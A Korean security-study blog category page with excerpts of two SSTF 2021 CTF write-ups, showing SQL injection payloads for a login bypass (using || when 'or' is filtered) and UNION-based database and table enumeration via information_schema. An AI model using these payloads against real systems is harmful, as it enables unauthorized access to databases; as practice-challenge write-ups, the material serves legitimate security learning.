교수님 이건 아니잖아요

  • 홈

CTF/SSTF [Hacker's Playground] 2

[SSTF 2021] SQLi 101 (Hacker's Playground)

id : guest pw : guest admin으로 로그인해야 함을 알 수 있고, 힌트로 query를 보여주고 있다. 쿼리 select id from users where id='{$_GET["id"]}' and pw='{$_GET["pw"]}' id : admin' or 1=1# pw : 1 or이 필터링된다는 것을 알 수 있다. or대신 ||을 사용해 공격을 시도했다. id : admin' || '1'='1 pw : 1 공격을 성공할 수 있었다.

CTF/SSTF [Hacker's Playground] 2021.08.19

[SSTF 2021] SQLi 102 (Hacker's Playground)

참인 쿼리 입력 ' or 1=1# 책 정보가 출력되었다. 컬럼 개수 알아내기 order by는 전체 컬럼 개수보다 더 큰 값을 입력하면 오류 발생 1' order by 1# 9개에서 오류 발생 → 컬럼 개수가 8개인 것을 알아냄 union을 사용해 인젝션 시도 DB명 알아내기 ' union select 1,2,3,4,schema_name,6,7,8 from information_schema.schemata# ' union select 1,2,3,4,database(),6,7,8 # sqli102 테이블명 알아내기 sqli102에서 테이블명 출력 ' union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=..

CTF/SSTF [Hacker's Playground] 2021.08.19
이전
1
다음
더보기
프로필사진

🧙‍♂️ SISS 21기

  • 전체 (384)
    • 후기 (5)
    • IT (10)
      • 업무자동화 (1)
      • 노션 (1)
      • Git (1)
    • Computer Science (2)
      • OS (0)
      • Network (0)
      • Algorithm (2)
    • 정보처리기사 (1)
    • 리눅스(Linux) (4)
    • C (19)
    • Python (4)
    • Java (5)
    • BOJ(백준) (41)
    • 프로그래머스 (1)
    • HackerRank (49)
      • Algorithms (36)
      • Data Structures (10)
      • C (3)
    • SWEA (48)
      • [D1] (19)
      • [D2] (20)
      • [D3] (9)
    • 대학원 (4)
    • 정보보안 (18)
      • 보안 이슈 (4)
      • 툴 사용법 (4)
    • Digital Forensics (7)
      • 논문리뷰 (2)
      • CTF-d (3)
    • Web Hacking (65)
      • BWAPP (5)
      • XSS game (6)
      • XSS challenge (14)
      • LoS (18)
      • Webhacking.kr (21)
    • 시스템 해킹 (27)
      • dream hack (10)
      • Lazenca (3)
      • LOB (9)
    • Over the Wire (30)
      • Bandit (2)
      • natas (28)
    • CTF (28)
      • picoCTF (9)
      • HackCTF (11)
      • Hacker Gateway (2)
      • SSTF [Hacker's Playground] (2)
      • CTF 문제제작&Write up (4)
    • 웹개발 (8)
      • PHP (4)
      • MySQL (3)

방문자수Total

  • Today :
  • Yesterday :

Tag

백준, HackerRank, xss challenge, XSS, BOJ, Los, C언어, LOB, webhacking, c++,

Copyright © Kakao Corp. All rights reserved.

티스토리툴바